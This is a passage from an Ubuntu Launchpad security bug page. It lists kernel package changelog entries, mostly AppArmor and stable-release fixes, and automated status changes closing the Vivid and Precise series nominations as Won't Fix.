status: Invalid → Fix Committed
Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (3.4 KiB)

This bug was fixed in the package linux - 4.8.0-11.12

---------------
linux (4.8.0-11.12) yakkety; urgency=low

  * change_hat is logging failures during expected hat probing (LP: #1615893)
    - SAUCE: apparmor: Fix auditing behavior for change_hat probing

  * deleted files outside of the namespace are not being treated as
    disconnected
    (LP: #1615892)
    - SAUCE: apparmor: deleted dentries can be disconnected

  * stacking to unconfined in a child namespace confuses mediation
    (LP: #1615890)
    - SAUCE: apparmor: special case unconfined when determining the mode

  * apparmor module parameters can be changed after the policy is locked
    (LP: #1615895)
    - SAUCE: apparmor: fix: parameters can be changed after policy is locked

  * AppArmor profile reloading causes an intermittent kernel BUG (LP:
    #1579135)
    - SAUCE: apparmor: fix vec_unique for vectors larger than 8

  * label vec reductions can result in reference labels instead of direct
    access
    to labels (LP: #1615889)
    - SAUCE: apparmor: reduction of vec to single entry is just that entry

  * profiles from different namespaces can block other namespaces from being
    able to load a profile (LP: #1615887)
    - SAUCE: apparmor: profiles in one ns can affect mediation in another ns

  * The label build for onexec when stacking is wrong (LP: #1615881)
    - SAUCE: apparmor: Fix label build for onexec stacking.

  * The inherit check for new to old label comparison for domain transitions
    is
    wrong (LP: #1615880)
    - SAUCE: apparmor: Fix new to old label comparison for domain transitions

  * warning stack trace while playing with apparmor namespaces (LP: #1593874)
    - SAUCE: apparmor: fix stack trace when removing namespace with profiles

  * __label_update proxy comparison test is wrong (LP: #1615878)
    - SAUCE: apparmor: Fix __label_update proxy comparison test

  * reading /sys/kernel/security/apparmor/profiles requires CAP_MAC_ADMIN
    (LP: #1560583)
    - SAUCE: apparmor: Allow ns_root processes to open profiles file
    - SAUCE: apparmor: Consult sysctl when reading profiles in a user ns

  * policy namespace stacking (LP: #1379535)
    - SAUCE: (no-up) apparmor: rebase of apparmor3.5-beta1 snapshot for 4.8
    - SAUCE: add a sysctl to enable unprivileged user ns AppArmor policy loading

  * Miscellaneous Ubuntu changes
    - [Debian] Dynamically determine linux udebs package name
    - [Debian] d-i -- fix dtb handling in new kernel-wedge form
    - SAUCE: apparmor: Fix FTBFS due to bad include path
    - SAUCE: apparmor: add data query support
    - [Config] Set CONFIG_SECURITY_APPARMOR_UNCONFINED_INIT=y

  * Miscellaneous upstream changes
    - fixup backout policy view capable for forward port
    - apparmor: fix: Rework the iter loop for label_update
    - apparmor: add more assertions for updates/merges to help catch errors
    - apparmor: Make pivot root transitions work with stacking
    - apparmor: convert delegating deleted files to mediate deleted files
    - apparmor: add missing parens. not a bug fix but highly recommended
    - apparmor: add a stack_version file to allow detection of bug fixes
    - apparmor: push path looku...

Read more...

Changed in linux (Ubuntu Yakkety):
status: Fix Committed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :
Download full text (17.3 KiB)

This bug was fixed in the package linux-raspi2 - 4.10.0-1001.3

---------------
linux-raspi2 (4.10.0-1001.3) zesty; urgency=low

  [ Tim Gardner ]

  * Release Tracking Bug
    - LP: #1673826

  * Rebased against Ubuntu-4.10.0-14.16
  * Updated BSP from https://github.com/raspberrypi/linux.git rpi-4.10.y
    to commit 8703162f0a3d04c74beb96973bf4180c14a08272

  * msleep() bug causes Nuvoton I2C TPM device driver delays (LP: #1667567)
    - tpm: msleep() delays - replace with usleep_range() in i2c nuvoton driver
    - SAUCE: tpm: add sleep only for retry in i2c_nuvoton_write_status()

  * C++ demangling support missing from perf (LP: #1396654)
    - [Config] added binutils-dev to Build-deps

  * dm-queue-length module is not included in installer/initramfs (LP: #1673350)
    - [Config] d-i: Also add dm-queue-length to multipath modules

  * move aufs.ko from -extra to linux-image package (LP: #1673498)
    - [config] aufs.ko moved to linux-image package

  * Using an NVMe drive causes huge power drain (LP: #1664602)
    - nvme: Add a quirk mechanism that uses identify_ctrl
    - nvme: Enable autonomous power state transitions

  * Broadcom bluetooth modules sometimes fail to initialize (LP: #1483101)
    - Bluetooth: btbcm: Add a delay for module reset

  * Need support of Broadcom bluetooth device [413c:8143] (LP: #1166113)
    - Bluetooth: btusb: Add support for 413c:8143

  * Zesty update to v4.10.3 stable release (LP: #1673118)
    - serial: 8250_pci: Add MKS Tenta SCOM-0800 and SCOM-0801 cards
    - KVM: s390: Disable dirty log retrieval for UCONTROL guests
    - KVM: VMX: use correct vmcs_read/write for guest segment selector/base
    - Bluetooth: Add another AR3012 04ca:3018 device
    - phy: qcom-ufs: Don't kfree devres resource
    - phy: qcom-ufs: Fix misplaced jump label
    - s390/qdio: clear DSCI prior to scanning multiple input queues
    - s390/dcssblk: fix device size calculation in dcssblk_direct_access()
    - s390/kdump: Use "LINUX" ELF note name instead of "CORE"
    - s390/chsc: Add exception handler for CHSC instruction
    - s390: TASK_SIZE for kernel threads
    - s390/topology: correct allocation of topology information
    - s390: make setup_randomness work
    - s390: use correct input data address for setup_randomness
    - net: mvpp2: fix DMA address calculation in mvpp2_txq_inc_put()
    - cxl: Prevent read/write to AFU config space while AFU not configured
    - cxl: fix nested locking hang during EEH hotplug
    - brcmfmac: fix incorrect event channel deduction
    - mnt: Tuck mounts under others instead of creating shadow/side mounts.
    - IB/ipoib: Fix deadlock between rmmod and set_mode
    - IB/IPoIB: Add destination address when re-queue packet
    - IB/mlx5: Fix out-of-bound access
    - IB/SRP: Avoid using IB_MR_TYPE_SG_GAPS
    - IB/srp: Avoid that duplicate responses trigger a kernel bug
    - IB/srp: Fix race conditions related to task management
    - Btrfs: fix data loss after truncate when using the no-holes feature
    - orangefs: Use RCU for destroy_inode
    - memory/atmel-ebi: Fix ns <-> cycles conversions
    - tracing: Fix return value check in trace_benchmark_reg()
    - ktest: Fix child exi...

Changed in linux-raspi2 (Ubuntu):
status: Invalid → Fix Released
Revision history for this message
Andy Whitcroft (apw) wrote : Closing unsupported series nomination.

This bug was nominated against a series that is no longer supported, ie vivid. The bug task representing the vivid nomination is being closed as Won't Fix.

This change has been made by an automated script, maintained by the Ubuntu Kernel Team.

Changed in linux-armadaxp (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-flo (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-goldfish (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-lts-quantal (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-lts-trusty (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-lts-utopic (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-lts-vivid (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-lts-wily (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-raspi2 (Ubuntu Vivid):
status: New → Won't Fix
Andy Whitcroft (apw)
Changed in linux-ti-omap4 (Ubuntu Vivid):
status: New → Won't Fix
Revision history for this message
Steve Langasek (vorlon) wrote :

The Precise Pangolin has reached end of life, so this bug will not be fixed for that release

Changed in linux (Ubuntu Precise):
status: New → Won't Fix
Changed in linux-armadaxp (Ubuntu Precise):
status: New → Won't Fix
Changed in linux-ti-omap4 (Ubuntu Precise):
status: New → Won't Fix
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.